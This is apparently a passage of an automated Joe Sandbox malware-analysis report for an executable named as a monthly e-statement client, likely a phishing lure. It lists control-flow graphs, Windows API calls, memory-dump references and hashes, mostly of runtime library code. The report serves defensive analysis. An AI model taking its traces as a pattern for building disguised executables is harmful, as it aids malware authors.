                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07115171544B14EAD520B7B5CC07FCBBB9C9FC2B00F444825B69AAA093DA69BA0446D0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 372 9a36fc-9a3724 GetModuleHandleExW 373 9a3749-9a374d 372->373 374 9a3726-9a3739 GetProcAddress 372->374 377 9a3758-9a3765 call 9a123a 373->377 378 9a374f-9a3752 FreeLibrary 373->378 375 9a373b-9a3746 374->375 376 9a3748 374->376 375->376 376->373 378->377
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009A36AD,?,?,009A364D,?,009B02E0,0000000C,009A37A4,?,00000002), ref: 009A371C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009A372F
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,009A36AD,?,?,009A364D,?,009B02E0,0000000C,009A37A4,?,00000002,00000000), ref: 009A3752
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$kz]G$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-2651540594
                                                                                                                                                                                                                                                    • Opcode ID: f5c5b6b6c3b5cee345cba3c3fc8daa72bf5ce57335e6a38a6a8b8f2249cf5797
                                                                                                                                                                                                                                                    • Instruction ID: c1947c51899ba33dfa64dfddaae16d4b80009a72cca998fc2dda1e9c2fcc6dfb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5c5b6b6c3b5cee345cba3c3fc8daa72bf5ce57335e6a38a6a8b8f2249cf5797
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF04F70A14218BBCB119B90DC59BAEBFB8EF4A756F058068F905A21A1DB309A45DAD0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 382 9a23d1-9a23d8 383 9a23da-9a23dc 382->383 384 9a23dd-9a23f8 GetLastError call 9a26a4 382->384 387 9a23fa-9a23fc 384->387 388 9a2411-9a2413 384->388 389 9a23fe-9a240f call 9a26df 387->389 390 9a2457-9a2462 SetLastError 387->390 388->390 389->388 393 9a2415-9a2425 call 9a3f67 389->393 396 9a2439-9a2449 call 9a26df 393->396 397 9a2427-9a2437 call 9a26df 393->397 403 9a244f-9a2456 call 9a3ec5 396->403 397->396 402 9a244b-9a244d 397->402 402->403 403->390
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,009A23C8,009A209F,009A1AFC), ref: 009A23DF
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009A23ED
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009A2406
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,009A23C8,009A209F,009A1AFC), ref: 009A2458
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: 97e89b1f36ae29c6e445d48ba2942f2f2d77e6d086137eb4517b81b861320483
                                                                                                                                                                                                                                                    • Instruction ID: 1f0778421684a10648ade3a8585c67e4c4cb789bfc5ad5a4ba40bfa6d74fe28f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e89b1f36ae29c6e445d48ba2942f2f2d77e6d086137eb4517b81b861320483
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F01A23222E7255FAA2437BCBD95B6B2798EB4B7B5730433AF520850F5EF514C81A2D0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 406 9a4424-9a4438 GetLastError 407 9a443a-9a4444 call 9a5904 406->407 408 9a4446-9a444b 406->408 407->408 413 9a448f-9a449a SetLastError 407->413 410 9a444d call 9a480c 408->410 412 9a4452-9a4458 410->412 414 9a445a 412->414 415 9a4463-9a4471 call 9a595a 412->415 416 9a445b-9a4461 call 9a4869 414->416 421 9a4473-9a4474 415->421 422 9a4476-9a448d call 9a4296 call 9a4869 415->422 424 9a449b-9a44a7 SetLastError call 9a3f24 416->424 421->416 422->413 422->424
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000008,?,009A6D69,?,?,?,009B04C8,0000002C,009A3F34,00000016,009A209F,009A1AFC), ref: 009A4428
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A445B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4483
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 009A4490
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 009A449C
                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 009A44A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                                                                    • Opcode ID: c5acc7f4753a69f818320f152b2077eb1deda1e2ecf8a15f74329538b6c0d544
                                                                                                                                                                                                                                                    • Instruction ID: 7c0458da830a0dc059612b4268513a2c57c66747594dc2976933aaa8ec07205b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5acc7f4753a69f818320f152b2077eb1deda1e2ecf8a15f74329538b6c0d544
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF04C32614680A7C61277397C1AB2B32EE9FC77B1B214514F528D61F6EFE88C0151E1

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 430 9a561e-9a5633 GetEnvironmentStringsW 431 9a568b 430->431 432 9a5635-9a5655 call 9a55e7 WideCharToMultiByte 430->432 433 9a568d-9a568f 431->433 432->431 438 9a5657 432->438 435 9a5698-9a56a0 433->435 436 9a5691-9a5692 FreeEnvironmentStringsW 433->436 436->435 439 9a5658 call 9a62ff 438->439 440 9a565d-9a5662 439->440 441 9a5680 440->441 442 9a5664-9a5678 WideCharToMultiByte 440->442 443 9a5682-9a5689 call 9a4869 441->443 442->441 444 9a567a-9a567e 442->444 443->433 444->443
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 009A5627
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A564A
                                                                                                                                                                                                                                                      • Part of subcall function 009A62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009A7E5B,?,00000000,?,009A686F,?,00000004,00000000,?,?,?,009A3BCD), ref: 009A6331
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009A5670
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A5683
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009A5692
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2278895681-0
                                                                                                                                                                                                                                                    • Opcode ID: 5cc7aeaddce1f6d234ba9182716affa7b021440e8335031685240dc3417c7ce1
                                                                                                                                                                                                                                                    • Instruction ID: 5f3fa6a80b051553f9f1b2388c8675da441cb2a8500b55e5eae32f4c0d6b4545
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cc7aeaddce1f6d234ba9182716affa7b021440e8335031685240dc3417c7ce1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601F272706A257F67211ABA6C8CD7B6A6DDEC3FA43570129FD04C3101EBA48C0191F0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 447 9a44a8-9a44bf GetLastError 448 9a44cd-9a44d2 447->448 449 9a44c1-9a44cb call 9a5904 447->449 450 9a44d4 call 9a480c 448->450 449->448 454 9a451e-9a4525 SetLastError 449->454 452 9a44d9-9a44df 450->452 455 9a44ea-9a44f8 call 9a595a 452->455 456 9a44e1 452->456 457 9a4527-9a452c 454->457 463 9a44fa-9a44fb 455->463 464 9a44fd-9a4513 call 9a4296 call 9a4869 455->464 458 9a44e2-9a44e8 call 9a4869 456->458 465 9a4515-9a451c SetLastError 458->465 463->458 464->454 464->465 465->457
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,009A47FE,009A7E79,?,009A686F,?,00000004,00000000,?,?,?,009A3BCD,?,00000000), ref: 009A44AD
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A44E2
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4509
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009A4516
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009A451F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                    • Opcode ID: ba09c35a27d5a27d8fc82be8c0877a7d33d206fcdbb34f6d04e35f9339815997
                                                                                                                                                                                                                                                    • Instruction ID: fded5f84c2846d130f9766056b595179bce5d116c575acb3b057d00859e5821e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba09c35a27d5a27d8fc82be8c0877a7d33d206fcdbb34f6d04e35f9339815997
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03012876714A10AB8212777D7C49F6B22AEEFC77B57210124F829D61A3EFF88D0151E0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 470 9a6176-9a6181 471 9a61dc-9a61de 470->471 472 9a6183-9a618b 470->472 473 9a618d-9a6193 call 9a4869 472->473 474 9a6194-9a619d 472->474 473->474 476 9a619f-9a61a5 call 9a4869 474->476 477 9a61a6-9a61af 474->477 476->477 480 9a61b8-9a61c1 477->480 481 9a61b1-9a61b7 call 9a4869 477->481 484 9a61ca-9a61d3 480->484 485 9a61c3-9a61c9 call 9a4869 480->485 481->480 484->471 488 9a61d5-9a61db call 9a4869 484->488 485->484 488->471
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A618E
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A61A0
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A61B2
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A61C4
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A61D6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: c3b5990c890ed81559309a32763a05512f4cf95010ca80d23c4dedf6f521789d
                                                                                                                                                                                                                                                    • Instruction ID: 5db9ddc53ffc435152a4955beeae74ce790df2cd1d2f07f1978ae1171494f2da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3b5990c890ed81559309a32763a05512f4cf95010ca80d23c4dedf6f521789d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29F0683261C200EFC660DB59F995D167BDDEAC676039C0805F409D7551C738FC4046D0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DAD
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DBF
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DD2
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DE3
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3DF4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: f6e2bc44cd29f672ddf2b38a49309d38521ea8868d2098397e895e18df462a31
                                                                                                                                                                                                                                                    • Instruction ID: 1ed1d2ce23bb772e06c544b66e59456a6695f5b55397e5c4f820ae2c397ec847
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6e2bc44cd29f672ddf2b38a49309d38521ea8868d2098397e895e18df462a31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F03A7882C2608FC7516F1DFE115497BA4EBCA730390031AF4129A2F1C7B90941ABC0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 0-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: 68ba754921730f120a9121d33d536a0ac322bdebb87ae24abe280438de080600
                                                                                                                                                                                                                                                    • Instruction ID: 7b38e3681c9452486022b70a4f72adb8e972aae187a2f4ef1e4feda927b3d3c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68ba754921730f120a9121d33d536a0ac322bdebb87ae24abe280438de080600
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C351AFB1D012499BDB11DFA8C945FAF7BB8EF87324F140559E401A7292DB749902CBF1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4A27
                                                                                                                                                                                                                                                      • Part of subcall function 009A474D: IsProcessorFeaturePresent.KERNEL32(00000017,009A473C,00000000,?,00000004,00000000,?,?,?,?,009A4749,00000000,00000000,00000000,00000000,00000000), ref: 009A474F
                                                                                                                                                                                                                                                      • Part of subcall function 009A474D: GetCurrentProcess.KERNEL32(C0000417), ref: 009A4771
                                                                                                                                                                                                                                                      • Part of subcall function 009A474D: TerminateProcess.KERNEL32(00000000), ref: 009A4778
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                    • String ID: *?$.$kz]G
                                                                                                                                                                                                                                                    • API String ID: 2667617558-3452094433
                                                                                                                                                                                                                                                    • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                    • Instruction ID: 78a79116cc77a7b907d09278ed75dc64e96126615173eb44040db4053fa0b922
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF519375E001199FDF14CFA8C881AAEF7B9EFDA314F24416AE454E7341E6759E018B90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe,00000104), ref: 009A2F93
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A305E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3068
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                    • API String ID: 2506810119-523020616
                                                                                                                                                                                                                                                    • Opcode ID: f16904c546643aae71a0d869174b2976b7a42eb28d12ffe7e9f451e278f5a1b9
                                                                                                                                                                                                                                                    • Instruction ID: 3c29098c12cac6862cdfee08b653947ad59b4286a683ba0f9ce3cf78b3980c1a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f16904c546643aae71a0d869174b2976b7a42eb28d12ffe7e9f451e278f5a1b9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0318F71A04258AFCB21DB99DC81AAEBBFCEFC6710F10806AF40497251D6748A40DBD1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,009A8BD9,?,00000000,?), ref: 009A892D
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,009A8BD9,?,00000000,?,00000000,00000000,?,00000000), ref: 009A895B
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009A8BD9,?,00000000,?,00000000,00000000,?,00000000), ref: 009A898C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 2456169464-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: 38788e87a9c816950a8dd613b3a705ea3f1f57c39a1e1431708bca070777dbe5
                                                                                                                                                                                                                                                    • Instruction ID: 039eecd2ec3780581e2f9c0762edcc618d64c6f41da43c9c55ca87158e86070f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38788e87a9c816950a8dd613b3a705ea3f1f57c39a1e1431708bca070777dbe5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10316D71A1021A9FDB24CF59DC90AEBB7B8FF49314F0444A9E91AD7250DB30AD80CFA1
                                                                                                                                                                                                                                                    APIs
